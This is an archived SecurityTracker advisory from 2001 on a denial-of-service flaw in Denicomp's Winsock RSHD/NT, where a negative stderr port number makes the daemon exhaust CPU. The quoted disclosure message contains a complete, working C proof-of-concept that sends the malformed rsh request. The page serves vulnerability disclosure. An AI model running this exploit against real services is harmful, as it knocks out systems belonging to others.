SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com





Category:   Application (Generic)  >   RSHD Vendors:   Denicomp Systems
Denicomp's Winsock RSHD/NT Can Be Denied Service By Remote Users Sending Invalid Port Numbers
SecurityTracker Alert ID:  1002930
SecurityTracker URL:  http://securitytracker.com/id/1002930
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Dec 10 2001
Impact:   Denial of service via network
Exploit Included:  Yes  
Version(s): 2.20.00
Description:   A denial of service vulnerability has been reported in Winsock RSHD from Denicomp Systems. A remote user can cause the rsh service to consume excessive CPU resources by sending an invalid port number to the service.

It is reported that a remote user can send an invalid port number (such as a negative number) to the Winsock RSHD to cause the daemon to attempt to connect to all ports below 1024 (even negative) and consume a large amount CPU processing resources.

The vendor has reportedly been notified.

A demonstration exploit transcript is provided in the Source Message.
Impact:   A remote user can cause the RSH daemon to consume a large amount of CPU processing resources, resulting in a potential denial of service condition.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.denicomp.com/rshdnt.htm (Links to External Site)
Cause:   Exception handling error
Underlying OS:   Windows (NT), Windows (2000)

Message History:   None.

 Source Message Contents
Date:  8 Dec 2001 14:24:48 -0000
Subject:  Winsock RSHD/NT 2.20.00 CPU overusage when invalid data is send




Greetings,

Seems that Winsock RSHD/NT has a bug in handling
invalid port numbers of stderr stream. When rsh 
client connects to the daemon it sends port number 
to which daemon will send informational data (stderr).
When this port is invalid (a negative number for 
example) Winsock RSHD/NT attempts to connect to 
all ports below 1024 (even negative) and consumes a 
large of CPU time. This may lead to DoS attack, 
Vendor was informed but no measures were taken.

Below is simple demo:

/*
** WRSHDNT 2.20.00 CPU overusage demo
** jimmers@yandex.ru
*/

#define	HOST	"localhost"
#define	PORT	514

#include <stdio.h>
#include <winsock2.h>

int main(int argc, char * argv[]){
	SOCKET s;
	WSADATA WSAData;
	LPHOSTENT lpHostEnt;
	SOCKADDR_IN sockAddr;
	int res, on = 1;
	char *stderr_port = "-666";
	char *local_user  = "Administrator";
	char *remote_user = "root";
	char *cmd = "help";

	res = WSAStartup( MAKEWORD( 2, 2 ), 
&WSAData);
	if(res != 0){
		res = WSAGetLastError();
		printf("WSAStartup() failed, 
WSAGetLastError: %d\n", res);
		return 1;
	}
	
	lpHostEnt = gethostbyname(HOST);
	if(lpHostEnt == NULL){
		res = WSAGetLastError();
		printf("gethostbyname() failed, 
WSAGetLastError: %d\n", res);
		WSACleanup();
		return 1;
	}
	
	s = socket(AF_INET, SOCK_STREAM, 
IPPROTO_TCP);
	if(s == INVALID_SOCKET){
		res = WSAGetLastError();
		printf("socket() failed, 
WSAGetLastError: %d\n", res);
		WSACleanup();
		return 1;
	}

	sockAddr.sin_family	= AF_INET;
	sockAddr.sin_port	= htons(PORT);
	sockAddr.sin_addr	= *((LPIN_ADDR)
*lpHostEnt->h_addr_list);
	
	res = connect(s, (PSOCKADDR)
&sockAddr, sizeof(sockAddr));
	if(res != 0){
		res = WSAGetLastError();
		printf("connect() failed, 
WSAGetLastError: %d\n", res);
		WSACleanup();
		return 1;
	}

	Sleep(400);	
	res = send(s, stderr_port, strlen
(stderr_port)+1, 0);
	if(res == SOCKET_ERROR){
		res = WSAGetLastError();
		printf("send(stderr_port) failed, 
WSAGetLastError: %d\n", res);
		WSACleanup();
		return 1;
	}
	
	printf("send(stderr_port): %d\n", res);

	Sleep(400);	
	res = send(s, local_user, strlen(local_user)
+1, 0);
	if(res == SOCKET_ERROR){
		res = WSAGetLastError();
		printf("send(local_user) failed, 
WSAGetLastError: %d\n", res);
		WSACleanup();
		return 1;
	}
	printf("send(local_user): %d\n", res);


	Sleep(400);	
	res = send(s, remote_user, strlen
(remote_user)+1, 0);
	if(res == SOCKET_ERROR){
		res = WSAGetLastError();
		printf("send(remote_user) failed, 
WSAGetLastError: %d\n", res);
		WSACleanup();
		return 1;
	}
	printf("send(remote_user): %d\n", res);


	Sleep(400);	
	res = send(s, cmd, strlen(cmd)+1, 0);
	if(res == SOCKET_ERROR){
		res = WSAGetLastError();
		printf("send(cmd) failed, 
WSAGetLastError: %d\n", res);
		WSACleanup();
		return 1;
	}
	printf("send(cmd): %d\n", res);

	WSACleanup();
	return 0;
}


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us

Copyright 2013, SecurityGlobal.net LLC